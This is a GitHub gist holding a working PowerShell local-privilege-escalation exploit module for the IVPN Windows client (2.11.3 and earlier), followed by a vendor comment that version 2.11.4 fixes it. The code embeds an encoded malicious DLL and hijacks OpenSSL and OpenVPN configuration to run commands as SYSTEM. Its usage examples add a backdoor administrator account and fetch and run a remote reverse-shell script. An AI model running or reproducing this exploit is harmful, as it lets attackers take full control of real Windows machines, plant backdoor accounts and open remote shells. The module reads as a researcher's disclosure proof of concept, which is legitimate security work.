Skip to content

Instantly share code, notes, and snippets.

@ykoster
Last active March 13, 2020 06:49
Show Gist options
  • Save ykoster/88baaad0e7341d4df016851adc21e159 to your computer and use it in GitHub Desktop.
Save ykoster/88baaad0e7341d4df016851adc21e159 to your computer and use it in GitHub Desktop.
IVPN <= 2.11.3 exploit module to run commands with SYSTEM privileges
<#
Example usage:
Import-Module .\Invoke-ExploitIVPNLPE.psd1
Invoke-ExploitIVPNLPEConfigHijack "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add"
Invoke-ExploitIVPNLPEPkcs11 "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add"
Invoke-ExploitIVPNLPEConfigOption -Command "powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')"
#>
@{
RootModule = 'Invoke-ExploitIVPNLPE.psm1'
ModuleVersion = '1.0'
GUID = '73630188-3482-4d37-a546-b114adcbe223'
Author = 'Yorick Koster'
CompanyName = 'Securify B.V.'
Copyright = '(c) Yorick Koster. All rights reserved.'
Description = 'IVPN exploit module to run commands with SYSTEM privileges'
RequiredAssemblies = @("$env:ProgramFiles\IVPN Client\IVPN.Core.dll")
FunctionsToExport = @("Invoke-ExploitIVPNLPEConfigHijack", "Invoke-ExploitIVPNLPEPkcs11", "Invoke-ExploitIVPNLPEConfigOption")
}
Enum ExploitMethod
{
ConfigHijack = 0
Pkcs11 = 1
ConfigOption = 2
}
Function Invoke-ExploitIVPNLPEConfigHijack {
Param([Parameter(Position = 0, Mandatory = $true, ValueFromRemainingArguments = $true)] [string[]]$Command)
Invoke-ExploitIVPNLPE -Command $($Command -join "`n") -ExploitMethod 0
}
Function Invoke-ExploitIVPNLPEPkcs11 {
Param([Parameter(Position = 0, Mandatory = $true, ValueFromRemainingArguments = $true)] [string[]]$Command)
Invoke-ExploitIVPNLPE -Command $($Command -join "`n") -ExploitMethod 1
}
Function Invoke-ExploitIVPNLPEConfigOption {
Param([Parameter(Position = 0, Mandatory = $true, ValueFromRemainingArguments = $true)] [string[]]$Command)
Invoke-ExploitIVPNLPE -Command $($Command -join "`n") -ExploitMethod 2
}
Function Invoke-ExploitIVPNLPE {
Param([Parameter(Position = 0, Mandatory = $true)] [string]$Command,
[Parameter(Position = 1, Mandatory = $true)] [ExploitMethod]$ExploitMethod)
# setup
New-Item -Type directory -Path $([IVPN.Platform]::SettingsDirectory) | Out-Null
Copy-Item -Path "$env:ProgramFiles\IVPN Client\etc\port.txt" -Destination "$([IVPN.Platform]::SettingsDirectory)\port.txt" | Out-Null
# embedded 32-bit DLL that runs payload.bat
$EncodedCompressedFile = "H4sICDkIWV4AA2RsbF94ODYuZGxsAOw6C3hTVZo3zS3EEkiGaSQLZQgYxuJA5940feTZQFtBp0DHFgQpj9CmtrZNSnLTVsWxNc3K9RrN7Oqujo+xgzPqWmdhZQDFT1tSKPgYa2GlWpdBxfnSCUqxit1Byf7/uTdtip2Z9duZz/n24/Q7Ofec85//df7HObd35U1hSk5RFA01Hqeo/ZRYHNRfLq1QZ8x7cQa154o35u+Xlbwxv7ym1qdr9Hpu9jobdJVOt9vD6ba6dF6/W1fr1hWtLtM1eKpcWdOnp+klHKXFFFUiu2IC3lPUjKumyVLmU1dChxGZa/0utGqpT3XWkecUkW+ZxD8pu8TOLx+nQC4HTOnEdfijFkFIswXoYttIUTVjiycpTwCGKX962uigKO0k432A94E/gzaLc7Vw0B5Plxi6MlkIsWyhSrdkVTk5JzwvxgGUHWSmZk+Ec1BMV5ZXBOyRU+LmIa6Mr8E5srb6fPjciXClk/PWSm3pynKJ+EpERkS6uknw1YpwRIcgM4W6WjAJf4U3lFMJOVolfJmTwHH1hD8F/oQluGsmk9dV76mU9uYJacHir8Etm1zCyyVRAmcyemk9VdpZF+2YCd2ejEhoz/dxJrQXf29cWxY4oxaK9Ppgl98raJQAGez/yY2BP8jY+MvoeTwZi10pwgOyKJhWXKPe1lkXOEPzo8Oq3TlPlsGqLj7iP9XxNDwGRlNU7R+I0POgiV4JpPcjskCPesOmzQeVlMREODAqUwWfgqeqDnQz9rywjhZsiDymDXHfp0wRVfuRJLonkOYw0Jwr0vSfZAclmjJV+wygQXrBLlX7bkrqkKnD0AsOqtoFHGUcCMJlCOX6zN4iPY1GyJfrFdDX8en6eF/gjDKQinLLgGPCuch2eGK3OpxQbhFI2JuK1FCsuwl3l0hM9HcAx4auj8fjYl+EHLoFB0DcMHKjbu2sA7wKbAhKXBN9FaLI0GKAQxBaBKGgie5WJ0ijGEOzEJW0xU1jO/AArv7k4viUpP81N/Jvri3jD/PHwFKC/bDZTGedv7aD2EEXtyJaNxVUs12vQKq4gjfqo/tkaFhKHOYr9DQOnVaJQ4eSB3/+VTwOg7BLKezHvamIGpiLgxHyUVDKxkh1ODoN8IcK47BHTVclry0TaQQuyPlD/kjsnyWGk0EcCfRcR/LwepEVsMdDnD9wQeZ/Ovr7lHEhZJIQn1JjYKrgZmDrUinfosakTB7+44xJh5//kjAzpEEBL4BRp8FD7B30v9RGySzAvPSBP8q42UKJPhN8The94yJRx7hDgBUqozemEFhl7EQY1iOgZGY8EIxeoRL9OIxlDf9R4IwWp9PBFH4LNI+OOTjakwg1XgAeXL7tzKPgTIE7lMDnVaCQ0GPvfUkMS4HqQUUiRkjDcc1wI/o5KjkzcDTOdvG/+/TXX7x1XfAop221Tqvwf364fToupvgMfVyjAMctDT12+uI4NsH2HqBI4ATHQx9WooM+g0z+5tRXSZQ5AjWHQIUefBTwsl0vYPrsDT4EnSLUEC4PPbgDuiPP8ideoMlsD3RxZ0eeDRFI0KO+ujd4hAzzqMEiPUmX0GqlNl1q1VKrlFqSmyRrimv6iAIyQ67PdsnQaDEKhMPV0l8HDUYtUKCehcBWdTjeR0ZCpbTgoHkNPoP5DwV6lBGyHyORiQ4I0VcrzO3SA40LcW5+cJBTxtMfI/2YzP8ZKGOLBjb2czT1Hu2GCDsYS+EjoUKZkB5EqGC/fzh2dNzfO9Si404dEen1puIAaib2ANl/EvAXd+iBsSTRiSpsq37vOMCpvujbmQmzgZ7FxEdDAMXToIjPiCJooUKvzq7Qp8c1p3FfD8U1UWx745pRbA8DvJbA02KGAPPVsgPZoH42yo6ywyKVWfzBL/p3Ihe8Jpnai7v+4ZWi/asBJPY+CkDsO7M3lQIXuoKmuoRiOrSG7k2lpbBI7BST1GkQc+cA/ihhSihW7HwdOkROvni4I5O0n8U1SpErWJeJVqbJEPtxzalGohEaqRD+08mMInrdNIoa8x/RH/WBUTkHG8CppRhPPBj1jRkFvRSdFjMKYIrmTxnLfkmeLsZ/3I30gE0N7KUgYi4NdowRQzmkUW4mBEbOHOhJl7IOrD+QCVH/ZfwxneQ+EuTARgpkrAhtOuk/NwES7AFwZo5FPTBtwhfw9GQqspMMK3LFdk2MGABPJwcU0k+aJ+bECDktmHTPq+77EsOcbTv02MHQjcqwkGbqbp4h3EbLVytMR1R3taFcEVngYLppxP8BcMJHogpIARCGe1XtH2FyxsWhjL3dH6bIBvgWdS85x0Q/BCD5cqWgwWm+aLYyVK5PR2dFr0Y85XrYRP22RLS6AyUPlXYFPniFUwSidODUBf/MQCryCTmdAWMjDiKfi/gANp3k/kKaL8NEokTMDjEe08QadASzGpz5xbjmTCNJvy85pJB8Mi2xn+z5oashCHeIWLVKovPlCgDekQDenTYWYmsceC5LG4sG1VJ8DpyxCnM5VOkgNx0ij+iIoj9ziQPBUjCrEN0aooPfQ6WeGo7+UIEngRYp2yzqAVecB+M7kZn9PYWddUvwJzA69SfPBkanCRrsqe57EU9G/ar2XMD6Ag61/Tf++u4ObVPsfw2e+I19/KuLhvmR7qg8VNSt4IuPx9IkjgMRBWyuMFPYh+kidDf+yt6OfgTxyrLxOE9G+Xf9A8LGvnEjuQY0JOSgRkN3nBZ3NEQ/EqLvEtTBfm42pFYlOY2VKlD9GEhhB94G7YPlWOYilu1HE1ohHAP7wWsR6VIaEkvQQh4V5Gw5B9PbNmXbRSJs4N8hM/EbXx/TtzBFtXeTQlhFh8LIqtCKv4EL6tALhPPi49yqwAWdqh03N3BBIZ4fpd3TLoXd+xB0Lkw/gkwcVQVfAvSC5nWJpQfRGTR90HsBf4bWAF+qfQ8TzCv7+IHpeCevDhBSlGrFAD+66Jh84/HoU5C1hJV91TwBDRxOcH/XKhRs4+tDuy8mzo+qvSr+tbbXAE+8tQBwvLboLdkRPsKPRrcCkh3zYt1C8fFFffKpZGwVZsZ5seeI0obeQV0UEVFOoyFqQRQxP+CdYUcZhscBsHRhbmsZCZJgjUZhiRb2TbChC2B8kePe/Ceeyg/HT4B3KIPnOYVQSHJnn7BBERz0D45ho8RgC3FQtOgmiH/seYiAHe3iaV4NMYkf3rApEXLIeVgpxnli9HtSSayIcIXSsQgR83IMneC8Ir8dErs84TsBU6gYo88PAxkg8jKeRmP3Jp+XMB8TZiDN6YAhFWRdtmvDOD8TFKNJKKafmyWkmCL+tJhdUJje4TL5g8IyBaw/d6nsbBfJ4wl8wgoFfz3JEv1wkIm9Bat2IlK+L/YHZIicD0jCgTvM/bDCuwTTghYSkF8raY1TRYthK2MK0Gd0Do2BXSsG9khYAlEFgxha28XbkP8kURGs/I6wjhBfQ+PtiB/wn+1NbZXiR29qe+IpIcNx8QgQe3zMfxIszBKhxSyXoC7eP8SlX0pLT0QfhtgwtA00j/lD7rC25eNLIi4VUg+cqNpatNNkqge6VHu7ImL+oqvb8lfeJM3Hfjvx/LS2DA/KeCaR32BV7fNOUe1blh48HypK0XJz2KNhoVRperd5qrxUAY0y0C0LdGWazvmjsKebEL9k78J2PcNb9VEbHotHFc011W029L2VN/k37seHaBkwDHKu7rBCT7UvnA5NKkWea6aEKtTa4MecgT0fSwsclgUimaZPOD3mEIV4Z6HhdBwdSEHb9Z/E+8+AdP+BZ3ZQ6uF+j9MFxkTK6KZAeRmhDJIqxVCl2teKPLTFxI53CsoMzjebPYpCH/MSoY95LxUa1Jhk8Gz/GEVOzvdFRJLVIsmzCWGnYMTqQ32NQZfBHUbhXy7C54rwJgI/gT3VvptExgZhO/qrw+cdV+u4qXB7UAWG4BRAOHvXP0RcDP1vXP7ZIupBsBbMUKA5MqAqOpgkQpjtSuJ/JBJOKO3JrwhH1/8vlaZjj4rxdILqZn7dXgSHfsOmL/q6o/Mu4Re2C63Qv1akrxfprxDph1sT1gKRwqja1wJmuiI9GA+VKLScnj0/fn4XlipNB4H+UgU0M9GWujNNF/3RDWwXnFiqw3wfQeOfHvuY0IdbQqArXVhBB4/6pwLzgP94cPDOqOBQbthEQDdPONANfjjxfPfjUhu+ngyV6JVeTdsQPgeuoJZgSyaaY4u6YWDd+oh45yGeLV6BSIkvrIC4hu06qS2X2hKpXSG1RVLrkFpGaheTNnGfQn8n4cRBbmG9DnLBFs+AsO37MWIn26/0/gqD9aCq/XExWOHS6DK8e+LhuEK4nRYKFaZRbkFoOQ1ZgiSLqQm4mTLELL6miYSFaYve5JV6frR7NCVkPETuFnApjZ4mFsgt5+WyXtkwJJPY82Pva2iRqg6xpZMwwffycm4OkAq1tiIGAG8V7YsIEPtpgviDiaGh2/G1TVNCnu0ktxGQ29Aq84TNdO9yUSXLRZVMpZKEXYnsnee+F4jBLaBZReQegU68z3Sy6Ry+n/CRNw1qtONki0B9d59KlacaYRsiuB+l0r5YpTaftGXiWwa8loQq9Ppoj/giSjFHvFcoE3cMgCnBs8SXeKsX4aMP4akFT9cV5D6EZ7poD8xHz35FkkB10t/QD86KiSFhX1B26cU0hM/U5fKNCu5Jn15874YFN2TXVZ11pxZ01u2CqoM5vJDvhmv3t83r5fLXLwsLPQ1lja7KhbofVuoWNDpvrfc4q7K2OrkF41MEEA5putLOuidmga+FO+toqPUwpm0VfQ/Lylr3zc1LmnON+A8/rrbBpat21tb7vS5zGrW0qsrr8vl0Cxt1NU6fzu3R1TY4b3Yt8bkquVqPm9Lp1tZ6Ob+z/sd+l/dWstBVpav2eHULq3Rbb+VcPp2T0znHsCC9sTWlXg8HeBKrmmu5Gl2lp8qlY1oWtiDcGned29Ps1jX6XP4qj47878iJdPGflZyn0lOva3J5fTiwsCorjfrza7bWcjpf7W2uBOzywkKzLnP5qjWLdHlZ2Uuaa93ZBp2BYfOZHCZ34rwpyzA+b2IZJv+bzf8l/Jfn/7bz3/b+TEr//1pMivWbsM3cIuaDRDVCPx+qFSrnamjMqqqvRzh1OkXZt+BTUX39Smet28Ea/gpsXC7fQrE2jj9rOfG7hYeSxipgbPG2yddWwXgT1Pug/grqQahvQz0DNcVLUTOhZkJdBvUGqG6o/wj1Caj7ob4N9STUT6FSPorKgJrlE3HboS2Bug7qFqg1UL1Qb4PaDvVeqP8C9Qmo/wZ1j+/vl6dnqEKvy8m5IE1VQvZaSlEnqCJXvYtzFXprudpKZ32ZlAVHqGI35/JeOkzNlxW3NDrdVcXuplqvx93gcnNlnBfSLSA7Ilvu4gr9Xi8MShSoo18fu66KeiNptLwGWKqCQWpqCoyWOH1csdfrAalnYX+lp8pf77oW0ukqZ4MLOL4TR8tu9UEcKIfMvtSHc/hEPYIz5bWVdYUeyPoUdTblOjew76yHDHmpIMXyEpez6WvD1F45SfulLi9k/Aanu9JFkLm8VA5dNsZzUa0XFni8twI/9+L4GncNKAVSfnFLpasRUQFXuOphuqze5WqknqLLXd6GWve48inq13R5vQ9YXuus97uoA/SfREIN0hPPF2AZdPIphaLupzY7G3w3b3a11MJstmxzLYgOaxuoPHj2bKWon8k2w7mhjno/ZbPfTZ4elTu3erwc9YwcNEC+YXlVXu11ucD25NXNoBl4yqBhd8hkHu3jvPUu0JEZn9yVDY3UerqpuhF2n6umxG9u/gb1R8U3rCouyTYkYn564zevDb6mSi+XwHC5/N0X9fhZHs/5pbPG+5fL5XK5/D8savz+lqKmMAxTxKxnqpltzF7mXeYjZoSh2CtZK1vJutkW9hfsHvYA282eYE+yQyxryDfcawhmv5o9lG0xLjV6jO3G+42/MS7Lceb4cu7M+VXO3pyDOe/lnMtJydXm5ub+KLcityq3Pvf23Mdzn8w9kjuQO5T7Se5I7oVcKk+R9528OXnz867Js+Q9lbcn73jeO3k1+U35z+f355/NV5sWmK4zrTVtNLWY7jE9bjpg6jeNmFLNaWaVea6ZMeeaHeZbzI3mVnPI/Ij5SfMx8wfmNMsPLKzFbKmw3GzxWwKWHZYHLL+0vGI5Ypllvdpqtjqs11rLrOutO6z3WZ+2vm8dtn5uvWhNtc2w5djKbOttm23ttntse2wnbTL7DLvWnm232VfYV9md9jp7wM7bLQVFBTcUrC/YVPB8wcsFrxe8XfBfBR8WUOT72HXQLGRYpoC5liljnIyH8TPbmeeZl5g3iE5l7DR2JqsFrfrYNvZu9l72GHuR3Wq4xeA13Ga4y3CP4Z8MPzP8wrDIaDCajcuMPmOPEb/7xQ9waCad0TIZjA6/A3aI3x1nMoth54xMPmNlHDjeKn5OrCSQFPkeGr+AUQNUDbOD6WJOMVFGwa6DPX2I3c8OsDDZBfDQ7EF4tYzI0Gz6Kej6pGnYNMOcYS42/xx0+5z5TfOnZo3le5allirL3Zaw5T8sxy3nLcust1v/1WqwLbWttnH2Pfbf2b+yf7fg6oKcgh0FjxTsKjhUMFxA6WREhhmMHuzsJqaRGWSpLTIig9fWarvf9pztXVvUJrdn2KldIuwJ+2n7OftF+wHU7SkZ+fy50/Cq4YxhWnZO9ursYPbD2c9m785+MftY9jRjqdFldBub/6dd83+p6ozj+OHeUDcFW0HbnLuwaFnN4rnnPp8vzznPOXcwRmxEzREVUWi1X4rUFTYkZlzL2WD7wW3WLNaylK21sm8KOWbYUNK6oxsYC9qm+C1BNGuSBv7Qc8//EOyHnh/OD4eHw+e8X+/P++GBj0zIfelLsxWytHn+JK/JPjkm5+RCKAAXyuEQfA+/wwDMwwhuxK+xgLZQDZ2ihyrsvOq844w71kehQA/PO+5ZF0PB+PNULFdG5ceyVP4hJ6WCtXACrsAgZGC+cXc5VuN32Igt+BvexGGcwSI+yr9yK9/mcZ7mDJWjImqJslWRqjLKNqk21atGVbFrpUJWejD6XbfEnXBz9Hp9QB/WR3SjvqA7dFKPGHc+1ZneHq/Nu+H96fV7I94Cv8g4scp48Rv/tH/N7/P/8Uf9aT8jnhPPC7QKBR64Jbqjs9FLtiXCwaj3OuiGCbDwddyK5/EujuEqWmP+voJO0Ay9wR/wXlN1L4fUCuWpL9WQmlG5TsSJOWGX3O3up26t/lEXe1YibEnzvYNYS73OfDduam92O9w77ojpsPd1ha7Vx3WL7tWveJ6fio+na+oMB6yP2bthhm1nsXc0fin9PhUOWPdEL8uXcJKucLWyBsKBJvnG161CRNcYr9aZ/LkXZfsTO2F32WP2rJ0fk7HKWDL2miyRDYbwrMyCQkhAM7RCyvCdjyVYg2fwKk4hU3ogPsvkXCXUQT00wc/QApehHTqgC3rM/j64D/3wAMbhMTwxVF/GBbgI38S3cBkWYgwJ1+MmLMYduAvL8DPcb4h/gfXYgCexCc8a8m3Yjp3YhbfwNv6LgybhJnDO5FsmZVMeRehtWk6CJL1Hq2kDbaZdVEYHqZaO0DH6hc7TdeqmJKWon4boP8Mjm3M5wovZZuQPeS1v5W28k0v5c07wYf6KvzWsGrnZuOwCt3MHJznFf/F9HuRRnuBHPMtzHFaZapHKMxm6VK1UUZXu73lBH1WaVEqIGlEn6kWD+EGcEefERaN2p+gSPSIp7om/TVIMi+d38LxY/4f1DFzd7jUANAAA"
$DeflatedStream = New-Object System.IO.Compression.GZipStream([System.IO.MemoryStream][System.Convert]::FromBase64String($EncodedCompressedFile), [System.IO.Compression.CompressionMode]::Decompress)
$dll = New-Object byte[] 13312
$DeflatedStream.Read($dll, 0, $dll.Length) | Out-Null
$DeflatedStream.Close() | Out-Null
# reflection stuff
$mConnectToService = [IVPN.IVPNClientProxy].GetMethod("ConnectToService", [Reflection.BindingFlags]"NonPublic, Instance")
$mSendRequest = [IVPN.IVPNClientProxy].GetMethod("SendRequest", [Reflection.BindingFlags]"NonPublic, Instance")
$fStreamReader = [IVPN.IVPNClientProxy].GetField("__StreamReader", "NonPublic, Instance")
$fStreamWriter = [IVPN.IVPNClientProxy].GetField("__StreamWriter", "NonPublic, Instance")
$fVersion = [IVPN.IVPNHelloRequest].GetField("Version", "NonPublic, Instance")
$fKey = [IVPN.IVPNSetPreferenceRequest].GetField("Key", "NonPublic, Instance")
$fValue = [IVPN.IVPNSetPreferenceRequest].GetField("Value", "NonPublic, Instance")
$fEntryVpnServer = [IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters].GetField("EntryVpnServer", "NonPublic, Instance")
$fUsername = [IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters].GetField("Username", "NonPublic, Instance")
$fPassword = [IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters].GetField("Password", "NonPublic, Instance")
$fPort = [IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters].GetField("Port", "NonPublic, Instance")
$fVpnType = [IVPN.IVPNConnectRequest].GetField("VpnType", "NonPublic, Instance")
$fOpenVpnParameters = [IVPN.IVPNConnectRequest].GetField("OpenVpnParameters", "NonPublic, Instance")
$fCurrentDns = [IVPN.IVPNConnectRequest].GetField("CurrentDns", "NonPublic, Instance")
# connect to service
$client = New-Object IVPN.IVPNClientProxy
$mConnectToService.Invoke($client, $null)
$client.ServiceConnected = $true
# send hello request
$hello = New-Object IVPN.IVPNHelloRequest
$fVersion.SetValue($hello, "2.11.2.0")
$mSendRequest.Invoke($client, $hello)
Start-Sleep 1
If($ExploitMethod -eq [ExploitMethod]::ConfigHijack) {
$targetfolder = "$env:SystemDrive\etc"
New-Item -Type directory -Path "$targetfolder\ssl" | Out-Null
Set-Content "$targetfolder\ssl\payload.bat" -Encoding ASCII $Command
Set-Content "$targetfolder\ssl\lpe.dll" -Encoding Byte $dll
Set-Content "$targetfolder\ssl\openssl.cnf" -Encoding ASCII "openssl_conf = init
[init]
engines = engines
[engines]
lpe = lpe
[lpe]
engine_id = lpe
dynamic_path = C:\\etc\\ssl\\lpe
default_algorithms = ALL
init = 1"
} Else {
$targetfolder = "$env:TEMP\" + [System.Guid]::NewGuid()
$dllname = [System.Guid]::NewGuid().ToString()
New-Item -Type directory -Path "$targetfolder" | Out-Null
Set-Content "$targetfolder\payload.bat" -Encoding ASCII $Command
Set-Content "$targetfolder\$dllname.dll" -Encoding Byte $dll
If($ExploitMethod -eq [ExploitMethod]::Pkcs11) {
$extraparam = "pkcs11-providers $("$targetfolder\$dllname.dll".Replace("\", "\\"))`npkcs11-id $dllname"
} Else {
Set-Content "$targetfolder\openvpn.cfg" -Encoding ASCII "engine $("$targetfolder\$dllname".Replace("\", "\\"))"
$extraparam = "config $("$targetfolder\openvpn.cfg".Replace("\", "\\"))"
}
# set OpenVPN extra config parameters
$setting = New-Object IVPN.IVPNSetPreferenceRequest
$fKey.SetValue($setting, "open_vpn_extra_parameters")
$fValue.SetValue($setting, $extraparam)
$mSendRequest.Invoke($client, $setting)
Start-Sleep 1
}
# launch OpenVPN
$server = New-Object IVPN.VpnProtocols.OpenVPN.OpenVPNVpnServer -Property @{IpAddresses = @("127.0.0.1"); GatewayId = "GatewayId"; CountryCode = "US"; Country = "United States"; City = "New York"}
$conparams = New-Object IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters
$fEntryVpnServer.SetValue($conparams, $server)
$fUsername.SetValue($conparams, "Username")
$fPassword.SetValue($conparams, "Password")
$fPort.SetValue($conparams, $(New-Object IVPN.VpnProtocols.DestinationPort(1337, 1)))
$conreq = New-Object IVPN.IVPNConnectRequest
$fVpnType.SetValue($conreq, [IVPN.VpnProtocols.VpnType]::OpenVPN)
$fOpenVpnParameters.SetValue($conreq, $conparams)
$fCurrentDns.SetValue($conreq, "8.8.8.8")
$mSendRequest.Invoke($client, $conreq)
Start-Sleep 3
# disconnect vpn
$mSendRequest.Invoke($client, $(New-Object IVPN.IVPNDisconnectRequest))
Start-Sleep 1
# disconnect from service
$fStreamReader.GetValue($client).Close()
$fStreamWriter.GetValue($client).Close()
$client = $null
# clean up
Remove-Item $([IVPN.Platform]::SettingsDirectory) -Force -Recurse
Remove-Item $targetfolder -Force -Recurse
}
@stenya
Copy link

stenya commented Mar 13, 2020

Hi.
This local privilege escalation vulnerability fixed since the Windows client v2.11.4.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment